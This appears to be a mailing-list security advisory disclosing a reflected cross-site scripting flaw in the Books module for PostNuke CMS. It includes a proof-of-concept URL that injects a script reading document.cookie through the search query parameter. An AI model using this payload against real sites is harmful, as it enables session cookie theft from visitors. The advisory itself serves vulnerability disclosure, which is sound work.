The Books Module for the PostNuke CMS XSS Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

- ----------------------------------------------------
Class :         input Validation Error

Risk :            Due to the simplicity of the attack and the number of sites
                   that run module books the risk is classified as Medium to  
                   High.

URL:             Http://pn-mod-books.sourceforge.net
- ----------------------------------------------------
This Books module version v0.54 is running as a Mutant (PN 0.64) 
This Books module version v0.6  is running as a Rogue (PN 0.7)
- ----------------------------------------------------

Exploit:
       
http://servernuke/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|

Change | x <>


- -------------------------------------------------------
Programmer of Books module receives a copy this report.
- --------------------------------------------------------


Salu2

Pistone
- - --------
Http://www.gauchohack.com.ar
Http://www.hackindex.org
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux